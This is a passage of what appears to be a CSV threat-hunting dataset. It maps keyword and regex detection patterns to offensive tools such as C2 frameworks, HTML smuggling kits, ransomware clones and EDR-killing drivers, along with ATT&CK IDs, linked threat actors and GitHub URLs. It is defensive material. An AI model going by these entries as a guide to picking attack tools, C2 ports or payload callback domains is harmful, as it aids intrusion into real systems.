tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","47315" "*Html-Injection-Read-File-Payloads.*",".{0,1000}Html\-Injection\-Read\-File\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation 
tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","47316" "*HTMLSmuggler-main*",".{0,1000}HTMLSmuggler\-main.{0,1000}","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","N/A","10","2","162","19","2024-02-27T23:03:55Z","2023-07-02T08:10:59Z","47317" "*HTran.cpp - HUC Packet Transmit Tool.*",".{0,1000}HTran\.cpp\s\-\sHUC\sPacket\sTransmit\sTool\..{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","47327" "*htrgouvea/nipe*",".{0,1000}htrgouvea\/nipe.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","1","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","47328" "*htrgouvea/nipe*",".{0,1000}htrgouvea\/nipe.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","47329" "*htshells-master*",".{0,1000}htshells\-master.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - 
T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47330" "*http* | hakrawler -d *",".{0,1000}http.{0,1000}\s\|\shakrawler\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47331" "*http*/127.0.0.1*:1337*",".{0,1000}http.{0,1000}\/127\.0\.0\.1.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - 
Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47333" "*http*/alertmsg.zip*",".{0,1000}http.{0,1000}\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47335" "*http*/charlotte.dll*",".{0,1000}http.{0,1000}\/charlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","47336" "*http*/demon.dll",".{0,1000}http.{0,1000}\/demon\.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47337" "*http*/demon.exe",".{0,1000}http.{0,1000}\/demon\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","47338" "*http*/demos/butcher/index.html*",".{0,1000}http.{0,1000}\/demos\/butcher\/index\.html.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47339" "*http*/john/Test/raw/master/*",".{0,1000}http.{0,1000}\/john\/Test\/raw\/master\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","47340" "*http*/localhost*:1337*",".{0,1000}http.{0,1000}\/localhost.{0,1000}\:1337.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 
T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47341" "*http*/zha0gongz1*",".{0,1000}http.{0,1000}\/zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona 
- Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","47342" "*http*://*/Terminator.sys",".{0,1000}http.{0,1000}\:\/\/.{0,1000}\/Terminator\.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","47343" "*http*://127.0.0.1:4433*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47344" "*http*://127.0.0.1:5556*",".{0,1000}http.{0,1000}\:\/\/127\.0\.0\.1\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47345" "*http*://localhost:4433*",".{0,1000}http.{0,1000}\:\/\/localhost\:4433.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - 
TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47346" "*http*://localhost:5556*",".{0,1000}http.{0,1000}\:\/\/localhost\:5556.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","47347" "*http*:3000/hook.js*",".{0,1000}http.{0,1000}\:3000\/hook\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47348" "*http*:3200/manjusaka*",".{0,1000}http.{0,1000}\:3200\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","47349" "*http*:801/bq1iFEP2*",".{0,1000}http.{0,1000}\:801\/bq1iFEP2.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","47350" "*http*127.0.0.1:21802*",".{0,1000}http.{0,1000}127\.0\.0\.1\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47351" "*http*127.0.0.1:3030*",".{0,1000}http.{0,1000}127\.0\.0\.1\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","47352" "*http*127.0.0.1:5000*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47353" "*http*127.0.0.1:50050*",".{0,1000}http.{0,1000}127\.0\.0\.1\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","47354" 
"*http*127.0.0.1:5096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47355" "*http*127.0.0.1:57230*",".{0,1000}http.{0,1000}127\.0\.0\.1\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47356" "*http*127.0.0.1:7096*",".{0,1000}http.{0,1000}127\.0\.0\.1\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47357" "*http*127.0.0.1:8080/*.dll*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47358" "*http*127.0.0.1:8080/*.exe*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - 
TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47359" "*http*127.0.0.1:8080/*.ps1*",".{0,1000}http.{0,1000}127\.0\.0\.1\:8080\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47360" "*http*127.0.0.1:9631*",".{0,1000}http.{0,1000}127\.0\.0\.1\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47361" "*http*localhost:21802*",".{0,1000}http.{0,1000}localhost\:21802.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47363" "*http*localhost:3030*",".{0,1000}http.{0,1000}localhost\:3030.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","47364" "*http*localhost:5000*",".{0,1000}http.{0,1000}localhost\:5000.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47365" 
"*http*localhost:50050*",".{0,1000}http.{0,1000}localhost\:50050.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","47366" "*http*localhost:5096*",".{0,1000}http.{0,1000}localhost\:5096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47367" "*http*localhost:57230*",".{0,1000}http.{0,1000}localhost\:57230.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47368" "*http*localhost:7096*",".{0,1000}http.{0,1000}localhost\:7096.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47369" "*http*localhost:9631*",".{0,1000}http.{0,1000}localhost\:9631.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","47370" 
"*http.title:*BIG-IP®*- Redirect*",".{0,1000}http\.title\:.{0,1000}BIG\-IP\®.{0,1000}\-\sRedirect.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","N/A","1","55","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z","47371" "*HTTP/EXEGOL-01.*",".{0,1000}HTTP\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47372" "*http://*.oast.fun/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.fun\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47376" "*http://*.oast.live/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.live\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47377" "*http://*.oast.me/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.me\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload 
callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47378" "*http://*.oast.online/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.online\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47379" "*http://*.oast.pro/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.pro\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload callback","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","FP Risk","9","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47380" "*http://*.oast.site/*",".{0,1000}http\:\/\/.{0,1000}\.oast\.site\/.{0,1000}","offensive_tool_keyword","burpsuite","domains used by burp collaborator - abused for payload 